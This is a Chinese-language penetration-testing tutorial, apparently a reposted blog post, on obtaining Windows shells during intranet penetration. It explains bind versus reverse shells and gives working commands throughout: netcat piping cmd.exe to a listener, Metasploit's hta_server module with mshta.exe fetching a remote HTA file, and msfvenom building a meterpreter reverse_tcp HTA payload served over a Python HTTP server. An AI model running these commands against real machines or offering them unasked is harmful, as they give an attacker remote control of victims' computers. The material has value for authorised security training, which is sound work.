内网渗透之Windows反弹shell(一)

目录

反向shell简介

01什么是正向shell

02什么是反向shell

Windows反弹shell

01NC正向shell

01NC反向shell

02mshta.exe

通过Metasoloit的HTA Web Server模块发起HTA攻击

通过msfvenom生成恶意hta文件


反向shell简介

01什么是正向shell

正向shell:控制端主动发起亲贵去连接被控制端·中间网络链路不存在阻碍

内网渗透之Windows反弹shell(一)_第1张图片

 

02什么是反向shell

反向shell(反弹shell):被控端主动发起请求去连接控制端·通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接受发过来的数据包。

内网渗透之Windows反弹shell(一)_第2张图片

 

Windows反弹shell

01NC正向shell

被控端:

nc -lvvp 6666 -e cmd.exe

内网渗透之Windows反弹shell(一)_第3张图片

控制端:

nc 192.168.0.105 6666

内网渗透之Windows反弹shell(一)_第4张图片

原理:

被控端将cmd.exe重定向到本地的6666端口·控制端主动连接被控端的6666端口·即可获得shell

01NC反向shell

控制端:

nc -lvvp 6666

内网渗透之Windows反弹shell(一)_第5张图片

被控端:

nc -e cmd.exe 192.168.0.104 6666

内网渗透之Windows反弹shell(一)_第6张图片

再查看控制端

内网渗透之Windows反弹shell(一)_第7张图片

原理:

被控端将cmd.exe重定向到控制端6666端口·控制端只需要监听本地的6666端口·即可获得shell

02mshta.exe

mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件

通过Metasoloit的HTA Web Server模块发起HTA攻击

use exploit/windows/misc/hta_server

set srvhost 192.168.0.104

exploit -j

内网渗透之Windows反弹shell(一)_第8张图片

mshta.exe http://192.168.0.104:8080/SxUxU5AvkuW2LCX.hta

内网渗透之Windows反弹shell(一)_第9张图片

反弹成功

内网渗透之Windows反弹shell(一)_第10张图片

通过msfvenom生成恶意hta文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f hta-psh -o 222.hta

内网渗透之Windows反弹shell(一)_第11张图片

 

开启监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.0.104 -P 4444

开启一个http服务,用于被控制端下载执行hta文件

python3 -m http.server

内网渗透之Windows反弹shell(一)_第12张图片

  

被控端执行

内网渗透之Windows反弹shell(一)_第13张图片

查看http服务

内网渗透之Windows反弹shell(一)_第14张图片

反弹成功

内网渗透之Windows反弹shell(一)_第15张图片

你可能感兴趣的:(内网渗透,安全,windows)